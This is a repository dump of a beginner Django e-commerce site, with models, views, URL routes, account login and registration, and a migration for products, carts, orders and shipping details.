self.critic_bn=critic_bn\n self.batch_size=batch_size\n self.buffer_size=buffer_size\n self.random_seed=random_seed\n self.max_episode_len=max_episode_len\n self.tensorboard_log=tensorboard_log\n self.replay_buffer=replay_buffer\n self.expert_buffer=expert_buffer\n self.expert_dir=expert_dir\n self.summary_dir=summary_dir\n \n self.summary_ops,self.summary_vars=self.build_summaries()\n \n self.sess=tf.Session()\n self.setup_models()\n \n def setup_models(self):\n if self.actor is None:\n print(\"setting up actor\")\n self.actor=ActorNetwork(sess=self.sess,\n state_dim=self.env.observation_space.shape[0],\n action_dim=self.env.action_space.shape[0],\n action_bound=self.env.action_space.high,\n learning_rate=self.actor_lr,\n tau=self.tau,\n batch_size=self.batch_size,\n actor_bn=self.actor_bn)\n if self.critic is None:\n print(\"setting up critic\")\n self.critic=CriticNetwork(sess=self.sess,\n state_dim=self.env.observation_space.shape[0],\n action_dim=self.env.action_space.shape[0],\n learning_rate=self.critic_lr,\n tau=self.tau,\n gamma=self.gamma,\n num_actor_vars=self.actor.get_num_trainable_vars(),\n critic_bn=self.critic_bn)\n \n if self.replay_buffer is None:\n print(\"Setting up replay buffer\")\n self.replay_buffer=ReplayBuffer(state_dim=self.state_dim,\n action_dim=self.action_dim,\n buffer_size=self.buffer_size,\n random_seed=self.random_seed)\n \n if self.expert_buffer is None:\n assert(self.expert_dir is not None)\n print(\"setting up expert buffer\")\n data=np.load(self.expert_dir)\n expert_len=len(data['obs'])\n self.expert_buffer=ReplayBuffer(state_dim=self.state_dim,\n action_dim=self.action_dim,\n buffer_size=expert_len,\n random_seed=self.random_seed)\n \n #Ignore the terminal part it says episode starts when replay \n #buffer is actually storing whether it is terminal or not\n# =============================================================================\n# for i in range(len(data['obs'])-1):\n# s=data['obs'][i]\n# a=data['actions'][i]\n# r=data['rewards'][i]\n# t= 0#data['episode_starts'][i+1]\n# s2=data['obs'][i+1]\n# self.expert_buffer.add(s,a,r,t,s2)\n# =============================================================================\n \n self.expert_buffer.expert_add(s=data['obs'],a=data['actions'],r=data['rewards'],t=data['episode_dones'],s2=data['obs_next'])\n \n \n \n def build_summaries(self):\n print(\"Building summaries\")\n episode_reward=tf.Variable(0.)\n tf.summary.scalar('episode_reward',episode_reward)\n episode_ave_max_q=tf.Variable(0.)\n tf.summary.scalar('Qmax_value',episode_ave_max_q)\n episode_expert_ave_max_q=tf.Variable(0.)\n tf.summary.scalar('Expert_Qmax_value',episode_expert_ave_max_q)\n summary_vars=[episode_reward,episode_ave_max_q,episode_expert_ave_max_q]\n summary_ops=tf.summary.merge_all()\n \n return summary_ops,summary_vars\n \n \n def train(self,num_episodes,actor_noise,writer):\n #build summaries, initialize global variables, make the writer\n #and first update actor and critic\n #Also initiate the expert buffer\n # for episodes: reset environment and set reward and ave max_q to\n #be zero now for max episode length: predict for current state the action\n #and store the result of that in buffer\n #If the buffer size is greater than the minibatch size, then\n #Sample from the buffer and the expert buffer\n #Train the critic. 
Use the gradients from the current states batch\n #Use it to get action gradients and train the actor\n # If terminal check the reward and break\n print (\"Getting into training\")\n for i in range(num_episodes):\n s=self.env.reset()\n ep_reward=0\n ep_ave_max_q=0\n ep_ave_max_q_expert=0\n \n for j in range(self.max_episode_len):\n \n a=self.actor.predict(np.reshape(s,(1,self.actor.s_dim)))+actor_noise()\n# =============================================================================\n# print(a[0])\n# =============================================================================\n s2,r,terminal,info=self.env.step(a[0])\n \n self.replay_buffer.add(np.reshape(s,(self.actor.s_dim,)),np.reshape(a,(self.actor.a_dim,)),r,terminal,np.reshape(s2,(self.actor.s_dim,)))\n \n if self.replay_buffer.size()>self.batch_size :\n \n s_batch,a_batch,r_batch,s2_batch=self.replay_buffer.sample_batch(self.batch_size)\n expert_s_batch,expert_a_batch,expert_r_batch,expert_s2_batch=self.expert_buffer.sample_batch(self.batch_size)\n \n target_q=self.critic.predict_target(s2_batch,self.actor.predict_target(s2_batch))\n \n expert_target_q=self.critic.predict_target(expert_s2_batch,self.actor.predict_target(expert_s2_batch))\n \n predicted_q_value,expert_q_value,_=self.critic.train(expert_s_batch,expert_a_batch,s_batch,a_batch,target_q,expert_target_q)\n# =============================================================================\n# print(\"predicted_q_value = \",predicted_q_value,\"exper_q_value\",expert_q_value)\n# =============================================================================\n \n ep_ave_max_q+=np.amax(predicted_q_value)\n ep_ave_max_q_expert+=np.amax(expert_q_value)\n \n a_outs=self.actor.predict(s_batch)\n grads=self.critic.action_gradients(s_batch,a_outs)\n \n self.actor.train(s_batch,grads[0])\n \n self.actor.update_target_network()\n self.critic.update_target_network()\n \n s=s2\n ep_reward+=r\n \n if terminal:\n# =============================================================================\n# print(\"ep_reward = \",ep_reward,\"ep_ave_max_q/float(j) = \",ep_ave_max_q/float(j),\"ep_ave_max_q_expert/float(j) = \",ep_ave_max_q_expert/float(j))\n# =============================================================================\n summary_str=self.sess.run(self.summary_ops,feed_dict={self.summary_vars[0]:ep_reward,self.summary_vars[1]:ep_ave_max_q/float(j),self.summary_vars[2]:ep_ave_max_q_expert/float(j)})\n writer.add_summary(summary_str,i)\n writer.flush()\n print('| Reward:{:d} | Episode:{:d}| Qmax:{:.4f} | Expert_Qmax:{:.4f}'.format(int(ep_reward),i,(ep_ave_max_q/float(j)),(ep_ave_max_q_expert/float(j))))\n break\n \n \n #This is where you stopped\n \n \n \n def learn(self,num_episodes=1000):\n \n print(\"Getting into learn\")\n #call the train function I guess\n self.sess.run(tf.global_variables_initializer())\n \n writer=tf.summary.FileWriter(self.summary_dir,self.sess.graph)\n self.actor.update_target_network()\n self.critic.update_target_network()\n \n self.actor_noise=OrnsteinUhlenbeckActionNoise(mu=np.zeros(self.env.action_space.shape[0]))\n \n \n self.train(num_episodes=num_episodes,actor_noise=self.actor_noise,writer=writer)\n \n \n \n \n\n\n\n\n\n# =============================================================================\n# env=gym.make('BipedalWalker-v2')\n# state_dim=env.observation_space.shape[0]\n# action_bound=env.action_space.high\n# =============================================================================\n\n \n \n \n \n \n \n \n \n \n" }, { "alpha_fraction": 
0.5598297715187073, "alphanum_fraction": 0.5708790421485901, "avg_line_length": 44.91353225708008, "blob_id": "ceca11083a51f5439da3574b7d38971e70c32863", "content_id": "6b832460e302cc777fe1aabae4c785213de5b16a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12218, "license_type": "no_license", "max_line_length": 229, "num_lines": 266, "path": "/Actor_critic_imitator.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 10 23:49:44 2019\n\n@author: sayambhu\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport tflearn\n\n\nclass ActorNetwork(object):\n \"\"\"\n Using almost same actor as ddpg except I am keeping batch normalization\n to be an option\n \"\"\"\n \n def __init__(self,sess, state_dim,action_dim,action_bound,learning_rate,tau,batch_size,actor_bn=True):\n self.sess=sess\n self.s_dim=state_dim\n self.a_dim=action_dim\n self.action_bound=action_bound\n self.learning_rate=learning_rate\n self.tau=tau\n self.batch_size=batch_size\n self.actor_bn=actor_bn\n \n #Actor Network\n self.inputs,self.out,self.scaled_out=self.create_actor_network(reuse=False,original=True)\n \n self.network_params=tf.trainable_variables(\"actor\")\n \n #Target Network\n self.target_inputs,self.target_out,self.target_scaled_out=self.create_actor_network(reuse=False,original=False)\n self.target_network_params=tf.trainable_variables(\"target_a\")#[len(self.network_params):]\n \n# =============================================================================\n# print(\"actor params = \",self.network_params,\"target actor params = \",self.target_network_params)\n# =============================================================================\n \n #Op for periodically updating target network with online network\n self.update_target_network_params=[self.target_network_params[i].assign(tf.multiply(self.network_params[i],self.tau)+tf.multiply(self.target_network_params[i],1.-self.tau)) for i in range(len(self.target_network_params))]\n \n #This gradient will be provided by critic network\n self.action_gradient=tf.placeholder(tf.float32,[None,self.a_dim])\n \n #Combine gradients here\n self.unnormalized_actor_gradients=tf.gradients(self.scaled_out,self.network_params,-self.action_gradient)\n# =============================================================================\n# print(self.unnormalized_actor_gradients)\n# =============================================================================\n self.actor_gradients=list(map(lambda x: tf.div(x,self.batch_size),self.unnormalized_actor_gradients))\n \n #Optimization op\n self.optimize=tf.train.AdamOptimizer(self.learning_rate).apply_gradients(zip(self.actor_gradients,self.network_params))\n \n self.num_trainable_vars=len(self.network_params)+len(self.target_network_params)\n \n \n def create_actor_network(self,reuse=False,original=True):\n \n inputs=tflearn.input_data(shape=[None,self.s_dim])\n \n if original:\n ns=\"actor\"\n else:\n ns=\"target_a\"\n \n with tf.variable_scope(ns) as scope:\n \n if reuse:\n tf.get_variable_scope().reuse_variables()\n \n if self.actor_bn:\n net=tflearn.fully_connected(inputs,400,name=\"FC_1\")\n net=tflearn.layers.normalization.batch_normalization(net)\n net=tflearn.activations.relu(net)\n net=tflearn.fully_connected(net,300,name=\"FC_2\")\n net=tflearn.layers.normalization.batch_normalization(net)\n net=tflearn.activations.relu(net)\n \n else:\n 
net=tflearn.fully_connected(inputs,64,name=\"FC_1\")\n net=tflearn.activations.relu(net)\n net=tflearn.fully_connected(net,64,name=\"FC_2\")\n net=tflearn.activations.relu(net)\n \n #Final layer weights between -0.003 to 0.003\n w_init=tflearn.initializations.uniform(minval=-0.003,maxval=0.003)\n out=tflearn.fully_connected(net,self.a_dim,activation='tanh',weights_init=w_init)\n \n scaled_out=tf.multiply(out,self.action_bound)\n return inputs,out,scaled_out\n \n def train(self,inputs,a_gradient):\n return self.sess.run(self.optimize,feed_dict={self.inputs:inputs,self.action_gradient:a_gradient})\n \n def predict(self,inputs):\n return self.sess.run(self.scaled_out,feed_dict={self.inputs:inputs})\n \n def predict_target(self,inputs):\n return self.sess.run(self.target_scaled_out,feed_dict={self.target_inputs:inputs})\n \n def update_target_network(self):\n self.sess.run(self.update_target_network_params)\n \n def get_num_trainable_vars(self):\n return self.num_trainable_vars\n\nclass CriticNetwork(object):\n \"\"\"\n Same as ddpg but with optional batch normalization \n and a separate loss function\n \"\"\"\n \n def __init__(self,sess,state_dim,action_dim,learning_rate,tau,gamma,num_actor_vars,critic_bn=True):\n self.sess=sess\n self.s_dim=state_dim\n self.a_dim=action_dim\n self.learning_rate=learning_rate\n self.tau=tau\n self.gamma=gamma\n self.critic_bn=critic_bn\n \n# =============================================================================\n# self.expert_inputs=tflearn.input_data(shape=[None,self.s_dim])\n# self.expert_action=tflearn.input_data(shape=[None,self.a_dim])\n# =============================================================================\n \n #create the critic network\n self.inputs,self.action,self.out=self.create_critic_network(reuse=False,original=True)\n self.network_params=tf.trainable_variables(\"critic\")#[num_actor_vars:]\n \n #Target network\n self.target_inputs,self.target_action,self.target_out=self.create_critic_network(reuse=False,original=False)\n self.target_network_params=tf.trainable_variables(\"target_c\")#[(len(self.network_params)+num_actor_vars):]\n \n #Expert network params\n self.expert_inputs,self.expert_action,self.expert_out=self.create_critic_network(reuse=True,original=True)\n self.expert_network_params=tf.trainable_variables(\"critic\")#[(len(self.network_params)+num_actor_vars+len(self.target_network_params)):]\n \n# =============================================================================\n# print(\"actor params = \",num_actor_vars,\"critic params =\",self.network_params,\"expert params =\",self.expert_network_params,\"target params = \",self.target_network_params,\"total params = \",tf.trainable_variables())\n# =============================================================================\n \n #Op for periodically updating target network with online network\n self.update_target_network_params=[self.target_network_params[i].assign(tf.multiply(self.network_params[i],self.tau)+tf.multiply(self.target_network_params[i],1.-self.tau)) for i in range(len(self.target_network_params))]\n# =============================================================================\n# self.update_network_to_expert_params=[self.expert_network_params[i].assign(self.network_params[i]) for i in range(len(self.expert_network_params))]\n# self.update_expert_to_network_params=[self.network_params[i].assign(self.expert_network_params[i]) for i in range(len(self.network_params))]\n# \n# =============================================================================\n \n 
#Network target y[i]\n self.predicted_q_value=tf.placeholder(tf.float32,[None,1])\n self.expert_q_value=tf.placeholder(tf.float32,[None,1])\n \n #Define loss and optimization op\n self.loss=self.JS_loss(self.expert_q_value,self.expert_out,self.predicted_q_value,self.out,self.gamma)\n self.optimize=tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n \n #Gradient of output (i.e. Q value) is taken with respect to the action\n self.action_grads=tf.gradients(self.out,self.action)\n \n def JS_loss_expert(self,predicted_q_value,out,gamma):\n \n predicted_q_value=tf.math.pow(predicted_q_value,gamma)\n def KL_loss(p,q):\n kl=p*tf.math.log(p+1e-12)-p*tf.math.log(q+1e-12)+(1.-p)*tf.math.log(1.-p+1e-12)-(1.-p)*tf.math.log(1.-q+1e-12)\n \n return kl\n M=(predicted_q_value+out)/2\n L1=KL_loss(out,M)\n L2=KL_loss(predicted_q_value,M)\n JSD_E=0.5*(L1+L2)\n \n return JSD_E\n \n def JS_loss_non_expert(self,predicted_q_value,out,gamma):\n \n predicted_q_value=tf.math.pow(predicted_q_value,gamma)/2\n def KL_loss(p,q):\n kl=p*tf.math.log(p+1e-12)-p*tf.math.log(q+1e-12)+(1.-p)*tf.math.log(1.-p+1e-12)-(1.-p)*tf.math.log(1.-q+1e-12)\n \n return kl\n M=(predicted_q_value+out)/2\n L1=KL_loss(out,M)\n L2=KL_loss(predicted_q_value,M)\n JSD_NE=0.5*(L1+L2)\n \n return JSD_NE\n \n def JS_loss(self,expert_predicted_q_value,expert_out,\n predicted_q_value,out,gamma):\n \n return self.JS_loss_expert(expert_predicted_q_value,\n expert_out,\n gamma)+self.JS_loss_non_expert(predicted_q_value,\n out,gamma)\n \n def create_critic_network(self,reuse=False,original=True):\n inputs=tflearn.input_data(shape=[None,self.s_dim])\n action=tflearn.input_data(shape=[None,self.a_dim])\n \n if original:\n ns=\"critic\"\n else:\n ns=\"target_c\"\n \n with tf.variable_scope(ns) as scope:\n \n if reuse:\n tf.get_variable_scope().reuse_variables()\n \n if self.critic_bn:\n net=tflearn.fully_connected(inputs,400)\n net=tflearn.layers.normalization.batch_normalization(net)\n net=tflearn.activations.relu(net)\n \n #Adding action in second hidden layer\n t1=tflearn.fully_connected(net,300)\n t2=tflearn.fully_connected(action,300)\n net=tflearn.activation(tf.matmul(net,t1.W)+tf.matmul(action,t2.W)+t2.b,activation='relu')\n \n \n else:\n net=tflearn.fully_connected(inputs,64)\n net=tflearn.activations.relu(net)\n t1=tflearn.fully_connected(net,64)\n t2=tflearn.fully_connected(action,64)\n net=tflearn.activation(tf.matmul(net,t1.W)+tf.matmul(action,t2.W)+t2.b,activation='relu')\n \n #linear layer connected to one output representing Q(s,a)\n w_init=tflearn.initializations.uniform(minval=-0.003,maxval=0.003)\n out=tflearn.fully_connected(net,1,weights_init=w_init,activation='sigmoid')\n \n return inputs,action,out\n \n def train(self,expert_inputs,expert_actions,inputs,action,predicted_q_value,expert_q_value):\n return self.sess.run([self.out,self.expert_out,self.optimize],feed_dict={self.expert_inputs:expert_inputs,\n self.expert_action:expert_actions,\n self.inputs:inputs,self.action:action,\n self.predicted_q_value:predicted_q_value,\n self.expert_q_value:expert_q_value})\n \n def predict_target(self,inputs,action):\n return self.sess.run(self.target_out,feed_dict={self.target_inputs:inputs,self.target_action:action})\n \n def predict(self,inputs,action):\n return self.sess.run(self.out,feed_dict={self.inputs:inputs,self.action:action})\n \n def action_gradients(self,inputs,actions):\n return self.sess.run(self.action_grads,feed_dict={self.inputs:inputs,self.action:actions})\n \n def update_target_network(self):\n 
self.sess.run(self.update_target_network_params)\n        \n# =============================================================================\n#     def update_network_to_expert(self):\n#         self.sess.run(self.update_network_to_expert_params)\n#         \n#     def update_expert_to_network(self):\n#         self.sess.run(self.update_expert_to_network_params)\n# =============================================================================\n        \n" }, { "alpha_fraction": 0.6101694703102112, "alphanum_fraction": 0.6338983178138733, "avg_line_length": 25.795454025268555, "blob_id": "3af4d6afc373acbc6b2e66f452bff539fa0075cb", "content_id": "915f1d71a2473dc85de72849b578f1142c7142a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1180, "license_type": "no_license", "max_line_length": 127, "num_lines": 44, "path": "/utils_imitate.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 12 23:57:35 2019\n\n@author: sayambhu\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\n\n\n\nclass OrnsteinUhlenbeckActionNoise:\n    def __init__(self,mu,sigma=0.3,theta=0.15,dt=1e-2,x0=None):\n        self.theta=theta\n        self.mu=mu\n        self.sigma=sigma\n        self.dt=dt\n        self.x0=x0\n        self.reset()\n        \n    def __call__(self):\n        x=self.x_prev+self.theta*(self.mu-self.x_prev)*self.dt+self.sigma*np.sqrt(self.dt)*np.random.normal(size=self.mu.shape)\n        self.x_prev=x\n        \n        return x\n    \n    def reset(self):\n        self.x_prev=self.x0 if self.x0 is not None else np.zeros_like(self.mu)\n    \n    def __repr__(self):\n        return 'OrnsteinUhlenbeckActionNoise(mu={},sigma={})'.format(self.mu,self.sigma)\n    \n#Tensorflow summary ops\n\ndef build_summaries():\n    episode_reward=tf.Variable(0.)\n    tf.summary.scalar('episode_reward',episode_reward)\n    episode_ave_max_q=tf.Variable(0.)\n    tf.summary.scalar('Qmax_value',episode_ave_max_q)\n    summary_vars=[episode_reward,episode_ave_max_q]\n    summary_ops=tf.summary.merge_all()\n    \n    return summary_ops,summary_vars\n\n" }, { "alpha_fraction": 0.7846890091896057, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 40.79999923706055, "blob_id": "d5c5edb1636ba7aa9d24ffe27880ae89a452e1c5", "content_id": "280d466ea9b7f61beb69e52957c9a768e4780e2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 209, "license_type": "no_license", "max_line_length": 97, "num_lines": 5, "path": "/README.md", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "# RL_Mtech_2_off_imitation\nThe second part of my Mtech project, where I work on off-policy imitation learning.\n\n\nIn order to run the whole program, make sure all files are in the same folder and run Test_Imitator.py.\n" } ]
6
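The critic loss in Actor_critic_imitator.py above treats the critic's sigmoid output and the gamma-discounted target Q value as Bernoulli parameters and penalizes the Jensen-Shannon divergence between them: the expert branch pulls the output towards target**gamma, while the non-expert branch pulls it towards target**gamma / 2. Below is a minimal NumPy sketch of the same formula with made-up inputs, useful for sanity-checking the math outside TensorFlow; it is not code from the repo.

```python
import numpy as np

def kl_bernoulli(p, q, eps=1e-12):
    # KL divergence between Bernoulli(p) and Bernoulli(q); mirrors the
    # inner KL_loss helper in JS_loss_expert / JS_loss_non_expert
    return (p * np.log(p + eps) - p * np.log(q + eps)
            + (1. - p) * np.log(1. - p + eps)
            - (1. - p) * np.log(1. - q + eps))

def js_bernoulli(p, q):
    # Jensen-Shannon divergence: mean of each side's KL to the midpoint
    m = (p + q) / 2.
    return 0.5 * (kl_bernoulli(q, m) + kl_bernoulli(p, m))

gamma = 0.99
target_q = np.array([0.9])  # made-up target critic output, in (0, 1)
out = np.array([0.6])       # made-up current critic output, in (0, 1)
expert_term = js_bernoulli(target_q ** gamma, out)
non_expert_term = js_bernoulli(target_q ** gamma / 2.0, out)
print(expert_term, non_expert_term)
```

Because both arguments stay strictly inside (0, 1), the 1e-12 epsilon only matters when the critic saturates towards 0 or 1, where it keeps the logs finite.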
furkhan26/Ecommer-website--django
https://github.com/furkhan26/Ecommer-website--django
8a723607cd7fef1e812795bf64a55182dc63e7fe
12e73f924dc6a11a4dc5c852db4c9352d6fee548
687820b3c26e199f45bcea0275bedb5f785b8f7f
refs/heads/master
2023-03-20T03:29:06.375561
2021-03-19T18:39:49
2021-03-19T18:39:49
336,041,385
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7020407915115356, "alphanum_fraction": 0.7020407915115356, "avg_line_length": 25.33333396911621, "blob_id": "b7d88ab6663d03b6bd3948dec0e6036dcd8f730b", "content_id": "ef3ad59f054376f3e5afb7a8a505dfcb9c2c6724", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 43, "num_lines": 9, "path": "/main/forms.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.forms import ModelForm\nfrom django.contrib.auth.models import User\nfrom .models import Products,CartDetails\nfrom django import forms\n\nclass UserData(ModelForm):\n class Meta:\n model = User\n fields = '__all__'\n " }, { "alpha_fraction": 0.5888594388961792, "alphanum_fraction": 0.5899204015731812, "avg_line_length": 31.5, "blob_id": "ed27158e30867504f0722fe265dbbf65dafcddf1", "content_id": "fd35072ae515dfa77268cef976ad0a4164cb78cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1885, "license_type": "no_license", "max_line_length": 111, "num_lines": 58, "path": "/accounts/views.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User, auth\nfrom main.models import *\n# Create your views here.\n\n\ndef login(request):\n if request.method == 'POST':\n email = request.POST['email']\n password = request.POST['password']\n user = auth.authenticate(request, username=email, password=password)\n if user is not None:\n auth.login(request, user)\n return redirect('/')\n else:\n messages.info(request, 'invalid details')\n return redirect('login')\n else:\n return render(request, \"login.html\")\n\n\ndef register(request):\n if request.method == 'POST':\n username = request.POST.get('email', False)\n email = request.POST['email']\n name = request.POST['name']\n number = request.POST['number']\n gender = request.POST['gender']\n print(gender)\n password1 = request.POST['pass']\n repassword = request.POST['repass']\n if password1 == repassword:\n if User.objects.filter(username=email).exists():\n messages.info(request, 'this email already registered')\n return redirect('register')\n else:\n\n user_ = User.objects.create_user(username=email, password=password1)\n \n customer=Customer.objects.create(user=user_,name=name,email=email,number=number,gender=gender,)\n customer.save()\n user_.save()\n print('user created')\n return redirect('/')\n else:\n messages.info(request, 'password not match')\n return redirect('register')\n return redirect('/')\n else:\n\n return render(request, \"register.html\")\n\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n" }, { "alpha_fraction": 0.8135592937469482, "alphanum_fraction": 0.8135592937469482, "avg_line_length": 28.5, "blob_id": "386ec09f7e9ba2e0dc07658415a9844d1a65a34f", "content_id": "3ee906e723eeef07e7f1af3bb1f226cac20d8eda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 32, "num_lines": 6, "path": "/main/admin.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import *\n# Register your models here.\nadmin.site.register(Products)\nadmin.site.register(CartDetails)\nadmin.site.register(Customer)\n" 
}, { "alpha_fraction": 0.7275661826133728, "alphanum_fraction": 0.7275661826133728, "avg_line_length": 31.29166603088379, "blob_id": "31d95230cbbff49755cc6a7e126791675f4e57fb", "content_id": "6c6e6016f9fa7898715fae18e437a99dda9dbfde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1549, "license_type": "no_license", "max_line_length": 105, "num_lines": 48, "path": "/main/views.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom .models import Products,CartDetails,Customer\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, JsonResponse\nfrom .forms import UserData\nimport uuid,random\n\nimport datetime\nfrom time import strftime\n\n# Create your views here.\ndef index(request):\n login_user = request.user\n products=Products.objects.all()\n # custId = Customer.objects.get(user_id=login_user)\n # item_count = CartDetails.objects.filter(id_customer=custId).count()\n if 'add_item' in request.POST:\n prod_id = request.POST['getitemId']\n db_products = Products.objects.get(id=prod_id)\n added_time = strftime(\"%Y-%m-%d %H:%M:%S\")\n # save_to_cart = CartDetails(id_product=db_products,date_cart=added_time,id_customer=custId).save()\n\n return render(request,'home.html',{'products':products}) \n\ndef productdetails(request,slug):\n sl=Products.objects.get(slug=slug)\n \n return render(request,'product-details.html',{'sl':sl})\n\ndef order_details(request):\n custId = Customer.objects.get(user_id=request.user)\n cart_db = CartDetails.objects.filter(id_customer=custId)\n print(cart_db)\n\n return render(request,'order_details.html',{'cart_db':cart_db})\n\ndef checkout(request):\n return render(request,'checkout.html')\n\ndef collection(request):\n return render(request,'collection.html')\n\ndef userprofile(request):\n user_ = str(request.user.username)\n form_ = UserData() #instance to be added here\n print(user_)\n\n return render(request,'userprofile.html',{'form_':form_})" }, { "alpha_fraction": 0.5210946202278137, "alphanum_fraction": 0.5518814325332642, "avg_line_length": 31.481481552124023, "blob_id": "60756d08032d0205aacf58d8600a1116c521879a", "content_id": "cfca6151006df51ce960a114c6cca52a801099e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 877, "license_type": "no_license", "max_line_length": 114, "num_lines": 27, "path": "/main/migrations/0001_initial.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.5 on 2020-12-30 18:33\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Products',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('img', models.ImageField(upload_to='static/images')),\n ('price', models.FloatField()),\n ('delprice', models.FloatField()),\n ('category', models.CharField(max_length=100, null=True)),\n ('brand', models.CharField(max_length=100, null=True)),\n ('color', models.CharField(max_length=100, null=True)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.709172248840332, "alphanum_fraction": 0.709172248840332, "avg_line_length": 39.6363639831543, "blob_id": "b0914bc05e994e97d967564947e195cb5040a069", "content_id": 
"45615a65443b28fca2a89526446d9bc51ace444e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 447, "license_type": "no_license", "max_line_length": 84, "num_lines": 11, "path": "/main/urls.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path('',views.index,name='index'),\n path('collection/',views.collection,name='collection'),\n path('product-details/<str:slug>/',views.productdetails,name='product-details'),\n path('order_details/',views.order_details, name=\"order_details\"),\n path('checkout/',views.checkout,name='checkout'),\n path('userprofile/',views.userprofile,name='userprofile'),\n]\n" }, { "alpha_fraction": 0.8169934749603271, "alphanum_fraction": 0.8169934749603271, "avg_line_length": 37.25, "blob_id": "ac12f988145462f3566053cb9dc114c58f11759b", "content_id": "fa5392796945140017374c2de3d331e6835d6539", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 153, "license_type": "no_license", "max_line_length": 92, "num_lines": 4, "path": "/README.md", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Ecommer-website--django\n\nWhere user can select products and cart is maintained, user should enter while checking out.\ncan manipulate product quantitys\n" }, { "alpha_fraction": 0.716183602809906, "alphanum_fraction": 0.7326892018318176, "avg_line_length": 44.83333206176758, "blob_id": "8fe05d1cf728aab811bdbddc2242ee2e5cb1942a", "content_id": "ac09a623d067cddcfde58d7f29dc1eeb79328d31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2484, "license_type": "no_license", "max_line_length": 93, "num_lines": 54, "path": "/main/models.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.conf import settings\nfrom django.utils.text import slugify\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nclass Customer(models.Model):\n user = models.OneToOneField(\n User, on_delete=models.CASCADE, null=True, blank=True)\n name = models.CharField(max_length=200, null=True)\n email = models.CharField(max_length=50, null=True)\n gender = models.CharField(max_length=50, null=True)\n number = models.CharField(max_length=50, null=True)\n\nclass Products(models.Model):\n name = models.CharField(max_length=100,null=True, blank=True)\n img = models.ImageField(upload_to='static/images')\n price = models.FloatField()\n delprice= models.FloatField()\n category=models.CharField(max_length=100,null=True, blank=True)\n brand=models.CharField(max_length=100,null=True, blank=True)\n color=models.CharField(max_length=100,null=True, blank=True)\n slug=models.SlugField(max_length=200,unique=True,null=True, blank=True)\n\n def __str__(self):\n return self.name \n\nclass CartDetails(models.Model): \n id_cart = models.AutoField(primary_key=True)\n id_product = models.ForeignKey(Products,on_delete=models.CASCADE, null=True, blank=True)\n id_customer = models.ForeignKey(Customer,on_delete=models.CASCADE, null=True, blank=True)\n date_cart = models.DateTimeField(auto_now=True, null=True, blank=True)\n\n def int(self):\n return self.id_cart\n\nclass OrderDetails(models.Model):\n id_order = models.AutoField(primary_key=True)\n product_id = models.ForeignKey(Products,on_delete=models.CASCADE)\n customer_id 
= models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE)\n cart_id = models.ForeignKey(CartDetails,on_delete=models.CASCADE)\n total_items = models.CharField(max_length=120,null=True, blank=True)\n total_price = models.CharField(max_length=60,null=True, blank=True)\n date_ordered = models.DateTimeField(auto_now=True)\n\n \nclass ShippingDetails(models.Model):\n id_shipping = models.AutoField(primary_key=True)\n id_order_id = models.ForeignKey(OrderDetails,on_delete=models.CASCADE)\n phone_no = models.IntegerField(null=True, blank=True)\n door_no = models.CharField(max_length=120,null=True, blank=True)\n address = models.CharField(max_length=220,null=True, blank=True)\n city = models.CharField(max_length=220,null=True, blank=True)\n pincode = models.CharField(max_length=120,null=True, blank=True)\n\n\n\n \n\n" }, { "alpha_fraction": 0.5409663915634155, "alphanum_fraction": 0.5735294222831726, "avg_line_length": 27.84848403930664, "blob_id": "d640996d3eeb505f78a54e47bac09174a5082cba", "content_id": "002a96f23a51c31ee61cce37748a28031a52c30b", "detected_licenses": [], 